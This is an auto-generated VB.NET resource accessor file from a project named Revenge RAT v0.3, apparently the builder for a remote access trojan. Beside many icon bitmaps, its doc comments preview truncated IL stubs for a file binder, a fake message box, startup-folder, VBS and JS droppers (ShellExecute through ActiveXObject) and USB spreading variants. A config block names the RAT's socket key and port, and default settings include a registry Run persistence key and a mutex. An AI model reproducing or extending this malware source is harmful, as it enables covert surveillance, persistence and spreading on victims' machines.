'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Revenge_RAT_v0._3.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _10() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_10", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _11() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_11", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1472450092_mouse_add() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1472450092_mouse_add", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1472450093_mouse() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1472450093_mouse", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1472451891_keyboard() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1472451891_keyboard", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1472451892_keyboard_add() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1472451892_keyboard_add", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1472453348_save() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1472453348_save", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1472453350_save_add2() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1472453350_save_add2", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1473000728_full_screen() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1473000728_full_screen", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1473000774_FullscreenExit() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1473000774_FullscreenExit", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1476121459_application() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1476121459_application", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1477596916_resultset_next() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1477596916_resultset_next", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1477596924_Stop() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1477596924_Stop", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1478078554_webcam_add() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1478078554_webcam_add", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1478078555_webcam_delete() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1478078555_webcam_delete", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1480588346_folder() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1480588346_folder", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1481030115_Opera() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1481030115_Opera", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1481030260_thunderbird_icon() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1481030260_thunderbird_icon", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _1481204153_error() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_1481204153_error", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _2() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_2", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _3() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_3", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _4() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_4", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _5() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_5", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _6() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_6", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _77() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_77", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _8() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_8", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _9() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_9", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _Default() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_Default", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property AppBigIcon() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("AppBigIcon", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0411:  nop
        '''      IL_0412:  ldstr      &quot;%Bytes%&quot;
        '''      IL_0417:  ldstr      &quot;|_RVR_|&quot;
        '''      IL_041c:  ldc.i4.m1
        '''      IL_041d:  ldc.i4.0
        '''      IL_041e:  call       string[] [Microsoft.VisualBasic]Microsoft.VisualBasic.Strings::Split(string,
        '''                                                                                                string,
        '''                                                                                                int32,
        '''                                    [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Binder() As String
            Get
                Return ResourceManager.GetString("Binder", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0468:  nop
        '''      IL_0469:  ldstr      &quot;%Bytes%&quot;
        '''      IL_046e:  ldstr      &quot;|_RVR_|&quot;
        '''      IL_0473:  ldc.i4.m1
        '''      IL_0474:  ldc.i4.0
        '''      IL_0475:  call       string[] [Microsoft.VisualBasic]Microsoft.VisualBasic.Strings::Split(string,
        '''                                                                                                string,
        '''                                                                                                int32,
        '''                                    [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property BinderUSB() As String
            Get
                Return ResourceManager.GetString("BinderUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Black_Currant() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Black_Currant", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_05ad:  nop
        '''      IL_05ae:  ldarg.0
        '''      IL_05af:  ldftn      instance void Nuclear_Explosion.Atomic::Complex_Method()
        '''      IL_05b5:  newobj     instance void [mscorlib]System.Threading.ThreadStart::.ctor(object,
        '''                                                                                       native int)
        '''      IL_05ba:  newobj     instance void [mscorlib]System.Threading.Thread::.ctor(class [mscorlib]System.Threading.ThreadStart)
        '''      IL_05bf:  stloc.s    V_14
        '''      IL_0 [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ComplexCall() As String
            Get
                Return ResourceManager.GetString("ComplexCall", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_063d:  nop
        '''      IL_063e:  ldarg.0
        '''      IL_063f:  ldftn      instance void Nuclear_Explosion.Atomic::Complex_Method()
        '''      IL_0645:  newobj     instance void [mscorlib]System.Threading.ThreadStart::.ctor(object,
        '''                                                                                       native int)
        '''      IL_064a:  newobj     instance void [mscorlib]System.Threading.Thread::.ctor(class [mscorlib]System.Threading.ThreadStart)
        '''      IL_064f:  stloc.s    V_14
        '''      IL_0 [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ComplexCallUSB() As String
            Get
                Return ResourceManager.GetString("ComplexCallUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .method public instance void  Complex_Method() cil managed
        '''  {
        '''    // Code size       944 (0x3b0)
        '''    .maxstack  14
        '''    .locals init (string V_0,
        '''             string V_1,
        '''             int32 V_2,
        '''             string V_3,
        '''             bool V_4,
        '''             bool V_5,
        '''             bool V_6,
        '''             bool V_7,
        '''             bool V_8,
        '''             bool V_9,
        '''             string[] V_10,
        '''             int32 V_11,
        '''             string V_12,
        '''             bool V_13,
        '''             bool V_14,
        '''         [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ComplexMethod() As String
            Get
                Return ResourceManager.GetString("ComplexMethod", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .method public instance void  Complex_Method() cil managed
        '''  {
        '''    // Code size       1010 (0x3f2)
        '''    .maxstack  26
        '''    .locals init (int32 V_0,
        '''             string V_1,
        '''             bool V_2,
        '''             string V_3,
        '''             string V_4,
        '''             bool V_5,
        '''             bool V_6,
        '''             bool V_7,
        '''             bool V_8,
        '''             bool V_9,
        '''             string[] V_10,
        '''             int32 V_11,
        '''             string V_12,
        '''             bool V_13,
        '''             bool V_14,
        '''        [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ComplexMethodUSB() As String
            Get
                Return ResourceManager.GetString("ComplexMethodUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;Rev&gt;
        '''&lt;Socket_Key&gt;
        '''&lt;![CDATA[Revenge-RAT]]&gt;
        '''&lt;/Socket_Key&gt;
        '''&lt;Connections_Port&gt;
        '''&lt;![CDATA[333]]&gt;
        '''&lt;/Connections_Port&gt;
        '''&lt;Minimizing&gt;
        '''&lt;![CDATA[True]]&gt;
        '''&lt;/Minimizing&gt;
        '''&lt;Listening&gt;
        '''&lt;![CDATA[False]]&gt;
        '''&lt;/Listening&gt;
        '''&lt;Ping&gt;
        '''&lt;![CDATA[15]]&gt;
        '''&lt;/Ping&gt;
        '''&lt;Visual&gt;
        '''&lt;![CDATA[True]]&gt;
        '''&lt;/Visual&gt;
        '''&lt;Notification&gt;
        '''&lt;![CDATA[False]]&gt;
        '''&lt;/Notification&gt;
        '''&lt;Sound&gt;
        '''&lt;![CDATA[False]]&gt;
        '''&lt;/Sound&gt;
        '''&lt;Desktop&gt;
        '''&lt;![CDATA[True]]&gt;
        '''&lt;/Desktop&gt;
        '''&lt;DesktopValue&gt;
        '''&lt;![CDATA[2]]&gt;
        '''&lt;/DesktopValue&gt;
        '''&lt;Webcam&gt;        ''' [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Config() As String
            Get
                Return ResourceManager.GetString("Config", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_00d2:  nop
        '''      IL_00d3:  ldstr      &quot;%DFN%&quot;
        '''      IL_00d8:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(string)
        '''      IL_00dd:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
        '''      IL_00e2:  ldstr      &quot;\\%DN%&quot;
        '''      IL_00e7:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  stri [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyClient() As String
            Get
                Return ResourceManager.GetString("CopyClient", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_00ed:  nop
        '''      IL_00ee:  ldstr      &quot;%DFN%&quot;
        '''      IL_00f3:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(string)
        '''      IL_00f8:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
        '''      IL_00fd:  ldstr      &quot;\\%DN%&quot;
        '''      IL_0102:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  stri [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyClientUSB() As String
            Get
                Return ResourceManager.GetString("CopyClientUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0330:  nop
        '''      IL_0331:  newobj     instance void [System]Microsoft.VisualBasic.VBCodeProvider::.ctor()
        '''      IL_0336:  callvirt   instance class [System]System.CodeDom.Compiler.ICodeCompiler [System]Microsoft.VisualBasic.VBCodeProvider::CreateCompiler()
        '''      IL_033b:  newobj     instance void [System]System.CodeDom.Compiler.CompilerParameters::.ctor()
        '''      IL_0340:  dup
        '''      IL_0341:  ldstr      &quot;/target:winexe&quot;
        '''      IL_0346:  callvirt   instance void [System]System.CodeDo [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyCodeDomStartup() As String
            Get
                Return ResourceManager.GetString("CopyCodeDomStartup", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_036f:  nop
        '''      IL_0370:  newobj     instance void [System]Microsoft.VisualBasic.VBCodeProvider::.ctor()
        '''      IL_0375:  callvirt   instance class [System]System.CodeDom.Compiler.ICodeCompiler [System]Microsoft.VisualBasic.VBCodeProvider::CreateCompiler()
        '''      IL_037a:  newobj     instance void [System]System.CodeDom.Compiler.CompilerParameters::.ctor()
        '''      IL_037f:  dup
        '''      IL_0380:  ldstr      &quot;/target:winexe&quot;
        '''      IL_0385:  callvirt   instance void [System]System.CodeDo [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyCodeDomStartupUSB() As String
            Get
                Return ResourceManager.GetString("CopyCodeDomStartupUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_01d5:  nop
        '''      IL_01d6:  ldc.i4.7
        '''      IL_01d7:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
        '''      IL_01dc:  ldstr      &quot;\\%J%.js&quot;
        '''      IL_01e1:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string)
        '''      IL_01e6:  ldstr      &quot;var activeXObj = new ActiveXObject(\&quot;Shell.Applicat&quot;
        '''      + &quot;ion\&quot;);\r\nactiveXObj.ShellExecute(\&quot;&quot;        ''' [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyJS() As String
            Get
                Return ResourceManager.GetString("CopyJS", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0202:  nop
        '''      IL_0203:  ldc.i4.7
        '''      IL_0204:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
        '''      IL_0209:  ldstr      &quot;\\%J%.js&quot;
        '''      IL_020e:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string)
        '''      IL_0213:  ldstr      &quot;var activeXObj = new ActiveXObject(\&quot;Shell.Applicat&quot;
        '''      + &quot;ion\&quot;);\r\nactiveXObj.ShellExecute(\&quot;&quot;        ''' [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyJSUSB() As String
            Get
                Return ResourceManager.GetString("CopyJSUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0117:  nop
        '''      IL_0118:  ldc.i4.7
        '''      IL_0119:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
        '''      IL_011e:  ldstr      &quot;\\%STF%.EXE&quot;
        '''      IL_0123:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string)
        '''      IL_0128:  stloc.0
        '''      IL_0129:  ldsfld     string Nuclear_Explosion.Atomic::App
        '''      IL_012e:  ldloc.0
        '''      IL_012 [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyStartup() As String
            Get
                Return ResourceManager.GetString("CopyStartup", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0138:  nop
        '''      IL_0139:  ldc.i4.7
        '''      IL_013a:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
        '''      IL_013f:  ldstr      &quot;\\%STF%.EXE&quot;
        '''      IL_0144:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string)
        '''      IL_0149:  stloc.1
        '''      IL_014a:  ldsfld     string Nuclear_Explosion.Atomic::App
        '''      IL_014f:  ldloc.1
        '''      IL_015 [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyStartupUSB() As String
            Get
                Return ResourceManager.GetString("CopyStartupUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0153:  nop
        '''      IL_0154:  ldc.i4.7
        '''      IL_0155:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
        '''      IL_015a:  ldstr      &quot;\\%V%.vbs&quot;
        '''      IL_015f:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string)
        '''      IL_0164:  ldc.i4.5
        '''      IL_0165:  newarr     [mscorlib]System.String
        '''      IL_016a:  dup
        '''      IL_016b:  ldc.i4.0
        '''     [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyVBS() As String
            Get
                Return ResourceManager.GetString("CopyVBS", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_017a:  nop
        '''      IL_017b:  ldc.i4.7
        '''      IL_017c:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
        '''      IL_0181:  ldstr      &quot;\\%V%.vbs&quot;
        '''      IL_0186:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string)
        '''      IL_018b:  ldc.i4.5
        '''      IL_018c:  newarr     [mscorlib]System.String
        '''      IL_0191:  dup
        '''      IL_0192:  ldc.i4.0
        '''     [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property CopyVBSUsb() As String
            Get
                Return ResourceManager.GetString("CopyVBSUsb", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Corduroy() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Corduroy", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Dark_Slate_Blue() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Dark_Slate_Blue", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Darkness() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Darkness", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to 127.0.0.1,
        '''333,
        '''Guest
        '''RV_MUTEX
        '''2500
        '''False
        '''0
        '''Client.exe
        '''False
        '''HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        '''Client
        '''False
        '''Client
        '''1
        '''False
        '''Client.exe
        '''Random
        '''Default
        '''Optional
        '''False
        '''Client.exe
        '''False
        '''Client
        '''False
        '''Client
        '''False
        '''Client
        '''False
        '''Client
        '''False
        '''Client.exe
        '''False
        '''[System.Reflection.Assembly]::LoadWithPartialName(&apos;System.Windows.Forms&apos;); [System.Windows.Forms.MessageBox]::Show(&apos;Hello World!&apos;,&apos;Hello!&apos;,0,64)
        '''False
        '''Installation
        '''Revenge-RAT client has been succe [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property DefaultSettings() As String
            Get
                Return ResourceManager.GetString("DefaultSettings", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Ebony() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Ebony", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property expand_less_white_24x24() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("expand_less_white_24x24", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property expand_more_white_24x24() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("expand_more_white_24x24", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0027:  nop
        '''      IL_0028:  ldstr      &quot;%Body%&quot;
        '''      IL_002d:  ldstr      &quot;%Title%&quot;
        '''      IL_0032:  ldstr      &quot;%Button%&quot;
        '''      IL_0037:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(string)
        '''      IL_003c:  ldstr      &quot;%Icon%&quot;
        '''      IL_0041:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(string)
        '''      IL_0046:  call       valuetype [System.Windows.Forms]System.Windows [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property FKMSG() As String
            Get
                Return ResourceManager.GetString("FKMSG", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_002d:  nop
        '''      IL_002e:  ldstr      &quot;%Body%&quot;
        '''      IL_0033:  ldstr      &quot;%Title%&quot;
        '''      IL_0038:  ldstr      &quot;%Button%&quot;
        '''      IL_003d:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(string)
        '''      IL_0042:  ldstr      &quot;%Icon%&quot;
        '''      IL_0047:  call       int32 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToInteger(string)
        '''      IL_004c:  call       valuetype [System.Windows.Forms]System.Windows [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property FKMSGUSB() As String
            Get
                Return ResourceManager.GetString("FKMSGUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Gondola() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Gondola", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property GoRC() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("GoRC", resourceCulture)
                Return CType(obj,Byte())
